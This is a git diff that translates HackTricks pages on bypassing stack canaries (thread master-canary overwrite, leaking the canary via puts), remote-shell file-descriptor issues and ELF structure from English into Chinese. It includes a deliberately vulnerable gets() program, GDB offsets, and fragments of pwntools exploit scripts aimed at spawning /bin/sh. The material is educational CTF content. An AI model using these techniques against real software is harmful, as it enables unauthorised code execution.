@@ -124,26 +119,24 @@ The following program is vulnerable to Buffer Overflow, but it is compiled with
 // gcc thread_canary.c -no-pie -l pthread -o thread_canary
 
 void win() {
-    execve("/bin/sh", NULL, NULL);
+execve("/bin/sh", NULL, NULL);
 }
 
 void* vuln() {
-    char data[0x20];
-    gets(data);
+char data[0x20];
+gets(data);
 }
 
 int main() {
-    pthread_t thread;
+pthread_t thread;
 
-    pthread_create(&thread, NULL, vuln, NULL);
-    pthread_join(thread, NULL);
+pthread_create(&thread, NULL, vuln, NULL);
+pthread_join(thread, NULL);
 
-    return 0;
+return 0;
 }
 ```
-
-Notice that `vuln` is called inside a thread. In GDB we can take a look at `vuln`, specifically, at the point where the program calls `gets` to read input data:
-
+注意到 `vuln` 是在一个线程内被调用的。在 GDB 中，我们可以查看 `vuln`，特别是程序调用 `gets` 读取输入数据的地方：
 ```bash
 gef> break gets
 Breakpoint 1 at 0x4010a0
@@ -156,9 +149,7 @@ gef> x/10gx $rdi
 0x7ffff7d7ee50: 0x0000000000000000      0x00007ffff7e17ac3
 0x7ffff7d7ee60: 0x0000000000000000      0x00007ffff7d7f640
 ```
-
-The above represents the address of `data`, where the program will write user input. The stack canary is found at `0x7ffff7d7ee48` (`0x493fdc653a156800`), and the return address is at `0x7ffff7d7ee50` (`0x00007ffff7e17ac3`):
-
+上述内容表示 `data` 的地址，程序将在此写入用户输入。栈金丝雀位于 `0x7ffff7d7ee48` (`0x493fdc653a156800`)，返回地址位于 `0x7ffff7d7ee50` (`0x00007ffff7e17ac3`)：
 ```bash
 gef> telescope $rdi 8 -n
 0x7ffff7d7ee20|+0x0000|+000: 0x0000000000000000  <-  $rdi
@@ -170,9 +161,7 @@ gef> telescope $rdi 8 -n
 0x7ffff7d7ee50|+0x0030|+006: 0x0000000000000000  <-  $rbp
 0x7ffff7d7ee58|+0x0038|+007: 0x00007ffff7e17ac3 <start_thread+0x2f3>  ->  0xe8ff31fffffe6fe9  <-  retaddr[2]
 ```
-
-Notice that the stack addresses do not belong to the actual stack:
-
+注意，栈地址不属于实际的栈：
 ```bash
 gef> vmmap stack
 [ Legend:  Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
@@ -180,9 +169,7 @@ Start              End                Size               Offset             Perm
 0x00007ffff7580000 0x00007ffff7d83000 0x0000000000803000 0x0000000000000000 rw- <tls-th1><stack-th2>  <-  $rbx, $rsp, $rbp, $rsi, $rdi, $r12
 0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 0x0000000000000000 rw- [stack]  <-  $r9, $r15
 ```
-
-The thread's stack is placed above the Thread Local Storage (TLS), where the master canary is stored:
-
+线程的栈位于线程本地存储（TLS）之上，主 canary 存储在此处：
 ```bash
 gef> tls
 $tls = 0x7ffff7d7f640
@@ -198,19 +185,15 @@ $tls = 0x7ffff7d7f640
 0x7ffff7d7f678|+0x0038|+007: 0x0000000000000000
 ...
 ```
-
 > [!NOTE]
-> Some of the above GDB functions are defined on an extension called [bata24/gef](https://github.com/bata24/gef), which has more features than the usual [hugsy/gef](https://github.com/hugsy/gef).
-
-As a result, a large Buffer Overflow can allow to modify both the stack canary and the master canary in the TLS. This is the offset:
+> 上述一些 GDB 函数是在一个名为 [bata24/gef](https://github.com/bata24/gef) 的扩展中定义的，该扩展具有比通常的 [hugsy/gef](https://github.com/hugsy/gef) 更多的功能。
 
+因此，大量的缓冲区溢出可以允许修改堆栈金丝雀和 TLS 中的主金丝雀。这是偏移量：
 ```bash
 gef> p/x 0x7ffff7d7f668 - $rdi
 $1 = 0x848
 ```
-
-This is a short exploit to call `win`:
-
+这是一个短小的利用来调用 `win`：
 ```python
 from pwn import *
 
@@ -227,11 +210,9 @@ io = context.binary.process()
 io.sendline(payload)
 io.interactive()
 ```
-
-## Other examples & references
+## 其他示例与参考
 
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
-  - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.
+- 64 位，无 PIE，nx，BF canary，在某些内存中写入 ROP 以调用 `execve` 并跳转到那里。
 - [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads)
-  - 64 bits, no PIE, nx, modify thread and master canary.
-
+- 64 位，无 PIE，nx，修改线程和主 canary。
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
index 8d32c23b9..78695c893 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
@@ -1,29 +1,28 @@
-# Print Stack Canary
+# 打印栈金丝雀
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Enlarge printed stack
+## 扩大打印的栈
 
-Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.
+想象一个情况，其中一个 **易受攻击的程序** 可以执行一个 **puts** 函数 **指向** **栈溢出** 的 **部分**。攻击者知道 **金丝雀的第一个字节是一个空字节** (`\x00`)，其余的金丝雀是 **随机** 字节。然后，攻击者可以创建一个溢出，**覆盖栈直到金丝雀的第一个字节**。
 
-Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).
+然后，攻击者 **在有效负载的中间调用 puts 功能**，这将 **打印所有金丝雀**（除了第一个空字节）。
 
-With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session).
+有了这些信息，攻击者可以 **制作并发送一个新攻击**，知道金丝雀（在同一程序会话中）。
 
-Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.
+显然，这种策略是非常 **受限** 的，因为攻击者需要能够 **打印** 他的 **有效负载** 的 **内容** 来 **提取** **金丝雀**，然后能够创建一个新有效负载（在 **同一程序会话** 中）并 **发送** **真实的缓冲区溢出**。
 
-**CTF examples:**&#x20;
+**CTF 示例：**&#x20;
 
 - [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
-  - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`
+- 64 位，启用 ASLR 但没有 PIE，第一步是填充溢出直到金丝雀的字节 0x00，然后调用 puts 并泄露它。利用金丝雀创建一个 ROP gadget 来调用 puts 以泄露 GOT 中 puts 的地址，然后再创建一个 ROP gadget 来调用 `system('/bin/sh')`
 
-## Arbitrary Read
+## 任意读取
 
-With an arbitrary read like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in:
+通过像格式 **字符串** 提供的任意读取，可能会泄露金丝雀。查看这个例子：[**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries)，你可以阅读关于滥用格式字符串以读取任意内存地址的内容：
 
 {{#ref}}
 ../../format-strings/
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
index 6c2500990..bb825843c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
@@ -1,15 +1,14 @@
-# Common Exploiting Problems
+# 常见的利用问题
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## FDs in Remote Exploitation
+## 远程利用中的文件描述符
 
-When sending an exploit to a remote server that calls **`system('/bin/sh')`** for example, this will be executed in the server process ofc, and `/bin/sh` will expect input from stdin (FD: `0`) and will print the output in stdout and stderr (FDs `1` and `2`). So the attacker won't be able to interact with the shell.
+当向远程服务器发送一个利用，例如调用 **`system('/bin/sh')`** 时，这将在服务器进程中执行，并且 `/bin/sh` 将期望从 stdin (FD: `0`) 接收输入，并将输出打印到 stdout 和 stderr (FDs `1` 和 `2`)。因此，攻击者将无法与 shell 进行交互。
 
-A way to fix this is to suppose that when the server started it created the **FD number `3`** (for listening) and that then, your connection is going to be in the **FD number `4`**. Therefore, it's possible to use the syscall **`dup2`** to duplicate the stdin (FD 0) and the stdout (FD 1) in the FD 4 (the one of the connection of the attacker) so it'll make feasible to contact the shell once it's executed.
-
-[**Exploit example from here**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
+解决此问题的一种方法是假设服务器启动时创建了 **FD 编号 `3`**（用于监听），然后，您的连接将位于 **FD 编号 `4`**。因此，可以使用系统调用 **`dup2`** 将 stdin (FD 0) 和 stdout (FD 1) 复制到 FD 4（攻击者的连接）中，这样在执行时就可以与 shell 进行联系。
 
+[**从这里获取利用示例**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
 ```python
 from pwn import *
 
@@ -26,14 +25,12 @@ p.sendline(rop.chain())
 p.recvuntil('Thanks!\x00')
 p.interactive()
 ```
-
 ## Socat & pty
 
-Note that socat already transfers `stdin` and `stdout` to the socket. However, the `pty` mode **include DELETE characters**. So, if you send a `\x7f` ( `DELETE` -)it will **delete the previous character** of your exploit.
+注意，socat 已经将 `stdin` 和 `stdout` 转发到套接字。然而，`pty` 模式 **包含 DELETE 字符**。因此，如果你发送 `\x7f` ( `DELETE` -)，它将 **删除你利用的前一个字符**。
 
-In order to bypass this the **escape character `\x16` must be prepended to any `\x7f` sent.**
+为了绕过这个问题，**必须在发送的任何 `\x7f` 前加上转义字符 `\x16`。**
 
-**Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**
+**在这里你可以** [**找到这个行为的示例**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**。**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
index 54cfbee51..a92db2451 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
@@ -4,8 +4,7 @@
 
 ## Program Headers
 
-The describe to the loader how to load the ELF into memory:
-
+描述加载器如何将ELF加载到内存中：
 ```bash
 readelf -lW lnstat
 
@@ -14,80 +13,78 @@ Entry point 0x1c00
 There are 9 program headers, starting at offset 64
 
 Program Headers:
-  Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
-  PHDR           0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R   0x8
-  INTERP         0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R   0x1
-      [Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
-  LOAD           0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000
-  LOAD           0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW  0x10000
-  DYNAMIC        0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW  0x8
-  NOTE           0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R   0x4
-  GNU_EH_FRAME   0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R   0x4
-  GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x10
-  GNU_RELRO      0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R   0x1
+Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
+PHDR           0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R   0x8
+INTERP         0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R   0x1
+[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
+LOAD           0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000
+LOAD           0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW  0x10000
+DYNAMIC        0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW  0x8
+NOTE           0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R   0x4
+GNU_EH_FRAME   0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R   0x4
+GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x10
+GNU_RELRO      0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R   0x1
 
- Section to Segment mapping:
-  Segment Sections...
-   00
-   01     .interp
-   02     .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
-   03     .init_array .fini_array .dynamic .got .data .bss
-   04     .dynamic
-   05     .note.gnu.build-id .note.ABI-tag .note.package
-   06     .eh_frame_hdr
-   07
-   08     .init_array .fini_array .dynamic .got
+Section to Segment mapping:
+Segment Sections...
+00
+01     .interp
+02     .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
+03     .init_array .fini_array .dynamic .got .data .bss
+04     .dynamic
+05     .note.gnu.build-id .note.ABI-tag .note.package
+06     .eh_frame_hdr
+07
+08     .init_array .fini_array .dynamic .got
 ```
+之前的程序有 **9 个程序头**，然后，**段映射** 指示 **每个节所在的程序头**（从 00 到 08）。
 
-The previous program has **9 program headers**, then, the **segment mapping** indicates in which program header (from 00 to 08) **each section is located**.
+### PHDR - 程序头
 
-### PHDR - Program HeaDeR
-
-Contains the program header tables and metadata itself.
+包含程序头表和元数据本身。
 
 ### INTERP
 
-Indicates the path of the loader to use to load the binary into memory.
+指示用于将二进制文件加载到内存中的加载器的路径。
 
 ### LOAD
 
-These headers are used to indicate **how to load a binary into memory.**\
-Each **LOAD** header indicates a region of **memory** (size, permissions and alignment) and indicates the bytes of the ELF **binary to copy in there**.
+这些头用于指示 **如何将二进制文件加载到内存中。**\
+每个 **LOAD** 头指示一个 **内存** 区域（大小、权限和对齐）并指示要复制到那里 ELF **二进制文件的字节**。
 
-For example, the second one has a size of 0x1190, should be located at 0x1fc48 with permissions read and write and will be filled with 0x528 from the offset 0xfc48 (it doesn't fill all the reserved space). This memory will contain the sections `.init_array .fini_array .dynamic .got .data .bss`.
+例如，第二个的大小为 0x1190，应该位于 0x1fc48，权限为读和写，并将从偏移量 0xfc48 填充 0x528（它并没有填满所有的保留空间）。这段内存将包含节 `.init_array .fini_array .dynamic .got .data .bss`。
 
 ### DYNAMIC
 
-This header helps to link programs to their library dependencies and apply relocations. Check the **`.dynamic`** section.
+此头有助于将程序链接到其库依赖项并应用重定位。检查 **`.dynamic`** 节。
 
 ### NOTE
 
-This stores vendor metadata information about the binary.
+此处存储有关二进制文件的供应商元数据信息。
 
 ### GNU_EH_FRAME
 
-Defines the location of the stack unwind tables, used by debuggers and C++ exception handling-runtime functions.
+定义堆栈展开表的位置，供调试器和 C++ 异常处理运行时函数使用。
 
 ### GNU_STACK
 
-Contains the configuration of the stack execution prevention defense. If enabled, the binary won't be able to execute code from the stack.
+包含堆栈执行防护的配置。如果启用，二进制文件将无法从堆栈执行代码。
 
 ### GNU_RELRO
 
-Indicates the RELRO (Relocation Read-Only) configuration of the binary. This protection will mark as read-only certain sections of the memory (like the `GOT` or the `init` and `fini` tables) after the program has loaded and before it begins running.
+指示二进制文件的 RELRO（重定位只读）配置。此保护将在程序加载后和开始运行之前，将内存的某些节（如 `GOT` 或 `init` 和 `fini` 表）标记为只读。
 
-In the previous example it's copying 0x3b8 bytes to 0x1fc48 as read-only affecting the sections `.init_array .fini_array .dynamic .got .data .bss`.
+在之前的示例中，它将 0x3b8 字节复制到 0x1fc48 作为只读，影响节 `.init_array .fini_array .dynamic .got .data .bss`。
 
-Note that RELRO can be partial or full, the partial version do not protect the section **`.plt.got`**, which is used for **lazy binding** and needs this memory space to have **write permissions** to write the address of the libraries the first time their location is searched.
+请注意，RELRO 可以是部分或完整，部分版本不保护节 **`.plt.got`**，该节用于 **懒绑定**，并需要此内存空间具有 **写权限** 以在第一次搜索其位置时写入库的地址。
 
 ### TLS
 
-Defines a table of TLS entries, which stores info about thread-local variables.
+定义一个 TLS 条目表，存储有关线程局部变量的信息。
 
-## Section Headers
-
-Section headers gives a more detailed view of the ELF binary
+## 节头
 
+节头提供了 ELF 二进制文件的更详细视图。
 ```
 objdump lnstat -h
 
@@ -95,159 +92,153 @@ lnstat:     file format elf64-littleaarch64
 
 Sections:
 Idx Name          Size      VMA               LMA               File off  Algn
-  0 .interp       0000001b  0000000000000238  0000000000000238  00000238  2**0
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  1 .note.gnu.build-id 00000024  0000000000000254  0000000000000254  00000254  2**2
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  2 .note.ABI-tag 00000020  0000000000000278  0000000000000278  00000278  2**2
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  3 .note.package 0000009c  0000000000000298  0000000000000298  00000298  2**2
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  4 .gnu.hash     0000001c  0000000000000338  0000000000000338  00000338  2**3
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  5 .dynsym       00000498  0000000000000358  0000000000000358  00000358  2**3
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  6 .dynstr       000001fe  00000000000007f0  00000000000007f0  000007f0  2**0
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  7 .gnu.version  00000062  00000000000009ee  00000000000009ee  000009ee  2**1
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  8 .gnu.version_r 00000050  0000000000000a50  0000000000000a50  00000a50  2**3
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
-  9 .rela.dyn     00000228  0000000000000aa0  0000000000000aa0  00000aa0  2**3
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
- 10 .rela.plt     000003c0  0000000000000cc8  0000000000000cc8  00000cc8  2**3
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
- 11 .init         00000018  0000000000001088  0000000000001088  00001088  2**2
-                  CONTENTS, ALLOC, LOAD, READONLY, CODE
- 12 .plt          000002a0  00000000000010a0  00000000000010a0  000010a0  2**4
-                  CONTENTS, ALLOC, LOAD, READONLY, CODE
- 13 .text         00001c34  0000000000001340  0000000000001340  00001340  2**6
-                  CONTENTS, ALLOC, LOAD, READONLY, CODE
- 14 .fini         00000014  0000000000002f74  0000000000002f74  00002f74  2**2
-                  CONTENTS, ALLOC, LOAD, READONLY, CODE
- 15 .rodata       00000686  0000000000002f88  0000000000002f88  00002f88  2**3
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
- 16 .eh_frame_hdr 000001b4  0000000000003610  0000000000003610  00003610  2**2
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
- 17 .eh_frame     000007b4  00000000000037c8  00000000000037c8  000037c8  2**3
-                  CONTENTS, ALLOC, LOAD, READONLY, DATA
- 18 .init_array   00000008  000000000001fc48  000000000001fc48  0000fc48  2**3
-                  CONTENTS, ALLOC, LOAD, DATA
- 19 .fini_array   00000008  000000000001fc50  000000000001fc50  0000fc50  2**3
-                  CONTENTS, ALLOC, LOAD, DATA
- 20 .dynamic      00000200  000000000001fc58  000000000001fc58  0000fc58  2**3
-                  CONTENTS, ALLOC, LOAD, DATA
- 21 .got          000001a8  000000000001fe58  000000000001fe58  0000fe58  2**3
-                  CONTENTS, ALLOC, LOAD, DATA
- 22 .data         00000170  0000000000020000  0000000000020000  00010000  2**3
-                  CONTENTS, ALLOC, LOAD, DATA
- 23 .bss          00000c68  0000000000020170  0000000000020170  00010170  2**3
-                  ALLOC
- 24 .gnu_debugaltlink 00000049  0000000000000000  0000000000000000  00010170  2**0
-                  CONTENTS, READONLY
- 25 .gnu_debuglink 00000034  0000000000000000  0000000000000000  000101bc  2**2
-                  CONTENTS, READONLY
+0 .interp       0000001b  0000000000000238  0000000000000238  00000238  2**0
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+1 .note.gnu.build-id 00000024  0000000000000254  0000000000000254  00000254  2**2
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+2 .note.ABI-tag 00000020  0000000000000278  0000000000000278  00000278  2**2
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+3 .note.package 0000009c  0000000000000298  0000000000000298  00000298  2**2
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+4 .gnu.hash     0000001c  0000000000000338  0000000000000338  00000338  2**3
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+5 .dynsym       00000498  0000000000000358  0000000000000358  00000358  2**3
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+6 .dynstr       000001fe  00000000000007f0  00000000000007f0  000007f0  2**0
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+7 .gnu.version  00000062  00000000000009ee  00000000000009ee  000009ee  2**1
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+8 .gnu.version_r 00000050  0000000000000a50  0000000000000a50  00000a50  2**3
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+9 .rela.dyn     00000228  0000000000000aa0  0000000000000aa0  00000aa0  2**3
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+10 .rela.plt     000003c0  0000000000000cc8  0000000000000cc8  00000cc8  2**3
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+11 .init         00000018  0000000000001088  0000000000001088  00001088  2**2
+CONTENTS, ALLOC, LOAD, READONLY, CODE
+12 .plt          000002a0  00000000000010a0  00000000000010a0  000010a0  2**4
+CONTENTS, ALLOC, LOAD, READONLY, CODE
+13 .text         00001c34  0000000000001340  0000000000001340  00001340  2**6
+CONTENTS, ALLOC, LOAD, READONLY, CODE
+14 .fini         00000014  0000000000002f74  0000000000002f74  00002f74  2**2
+CONTENTS, ALLOC, LOAD, READONLY, CODE
+15 .rodata       00000686  0000000000002f88  0000000000002f88  00002f88  2**3
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+16 .eh_frame_hdr 000001b4  0000000000003610  0000000000003610  00003610  2**2
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+17 .eh_frame     000007b4  00000000000037c8  00000000000037c8  000037c8  2**3
+CONTENTS, ALLOC, LOAD, READONLY, DATA
+18 .init_array   00000008  000000000001fc48  000000000001fc48  0000fc48  2**3
+CONTENTS, ALLOC, LOAD, DATA
+19 .fini_array   00000008  000000000001fc50  000000000001fc50  0000fc50  2**3
+CONTENTS, ALLOC, LOAD, DATA
+20 .dynamic      00000200  000000000001fc58  000000000001fc58  0000fc58  2**3
+CONTENTS, ALLOC, LOAD, DATA
+21 .got          000001a8  000000000001fe58  000000000001fe58  0000fe58  2**3
+CONTENTS, ALLOC, LOAD, DATA
+22 .data         00000170  0000000000020000  0000000000020000  00010000  2**3
+CONTENTS, ALLOC, LOAD, DATA
+23 .bss          00000c68  0000000000020170  0000000000020170  00010170  2**3
+ALLOC
+24 .gnu_debugaltlink 00000049  0000000000000000  0000000000000000  00010170  2**0
+CONTENTS, READONLY
+25 .gnu_debuglink 00000034  0000000000000000  0000000000000000  000101bc  2**2
+CONTENTS, READONLY
 ```
+它还指示了位置、偏移量、权限以及该部分的**数据类型**。
 
-It also indicates the location, offset, permissions but also the **type of data** it section has.
+### 元部分
 
-### Meta Sections
+- **字符串表**：它包含 ELF 文件所需的所有字符串（但不包括程序实际使用的字符串）。例如，它包含像 `.text` 或 `.data` 这样的部分名称。如果 `.text` 在字符串表中的偏移量为 45，它将在 **name** 字段中使用数字 **45**。
+- 为了找到字符串表的位置，ELF 包含一个指向字符串表的指针。
+- **符号表**：它包含有关符号的信息，如名称（在字符串表中的偏移量）、地址、大小以及有关符号的更多元数据。
 
-- **String table**: It contains all the strings needed by the ELF file (but not the ones actually used by the program). For example it contains sections names like `.text` or `.data`. And if `.text` is at offset 45 in the strings table it will use the number **45** in the **name** field.
-  - In order to find where the string table is, the ELF contains a pointer to the string table.
-- **Symbol table**: It contains info about the symbols like the name (offset in the strings table), address, size and more metadata about the symbol.
+### 主要部分
 
-### Main Sections
+- **`.text`**：要运行的程序指令。
+- **`.data`**：在程序中具有定义值的全局变量。
+- **`.bss`**：未初始化的全局变量（或初始化为零）。这里的变量会自动初始化为零，从而防止无用的零被添加到二进制文件中。
+- **`.rodata`**：常量全局变量（只读部分）。
+- **`.tdata`** 和 **`.tbss`**：当使用线程局部变量时（C++ 中的 `__thread_local` 或 C 中的 `__thread`），类似于 .data 和 .bss。
+- **`.dynamic`**：见下文。
 
-- **`.text`**: The instruction of the program to run.
-- **`.data`**: Global variables with a defined value in the program.
-- **`.bss`**: Global variables left uninitialized (or init to zero). Variables here are automatically intialized to zero therefore preventing useless zeroes to being added to the binary.
-- **`.rodata`**: Constant global variables (read-only section).
-- **`.tdata`** and **`.tbss`**: Like the .data and .bss when thread-local variables are used (`__thread_local` in C++ or `__thread` in C).
-- **`.dynamic`**: See below.
-
-## Symbols
-
-Symbols is a named location in the program which could be a function, a global data object, thread-local variables...
+## 符号
 
+符号是程序中的一个命名位置，可以是一个函数、一个全局数据对象、线程局部变量等。
 ```
 readelf -s lnstat
 
 Symbol table '.dynsym' contains 49 entries:
-   Num:    Value          Size Type    Bind   Vis      Ndx Name
-     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
-     1: 0000000000001088     0 SECTION LOCAL  DEFAULT   12 .init
-     2: 0000000000020000     0 SECTION LOCAL  DEFAULT   23 .data
-     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strtok@GLIBC_2.17 (2)
-     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
-     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strlen@GLIBC_2.17 (2)
-     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fputs@GLIBC_2.17 (2)
-     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND exit@GLIBC_2.17 (2)
-     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.34 (3)
-     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND perror@GLIBC_2.17 (2)
-    10: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterT[...]
-    11: 0000000000000000     0 FUNC    WEAK   DEFAULT  UND _[...]@GLIBC_2.17 (2)
-    12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND putc@GLIBC_2.17 (2)
-    [...]
+Num:    Value          Size Type    Bind   Vis      Ndx Name
+0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
+1: 0000000000001088     0 SECTION LOCAL  DEFAULT   12 .init
+2: 0000000000020000     0 SECTION LOCAL  DEFAULT   23 .data
+3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strtok@GLIBC_2.17 (2)
+4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
+5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strlen@GLIBC_2.17 (2)
+6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fputs@GLIBC_2.17 (2)
+7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND exit@GLIBC_2.17 (2)
+8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.34 (3)
+9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND perror@GLIBC_2.17 (2)
+10: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterT[...]
+11: 0000000000000000     0 FUNC    WEAK   DEFAULT  UND _[...]@GLIBC_2.17 (2)
+12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND putc@GLIBC_2.17 (2)
+[...]
 ```
+每个符号条目包含：
 
-Each symbol entry contains:
-
-- **Name**
-- **Binding attributes** (weak, local or global): A local symbol can only be accessed by the program itself while the global symbol are shared outside the program. A weak object is for example a function that can be overridden by a different one.
-- **Type**: NOTYPE (no type specified), OBJECT (global data var), FUNC (function), SECTION (section), FILE (source-code file for debuggers), TLS (thread-local variable), GNU_IFUNC (indirect function for relocation)
-- **Section** index where it's located
-- **Value** (address sin memory)
-- **Size**
-
-## Dynamic Section
+- **名称**
+- **绑定属性**（弱、局部或全局）：局部符号只能被程序本身访问，而全局符号则在程序外部共享。弱对象例如是可以被不同函数覆盖的函数。
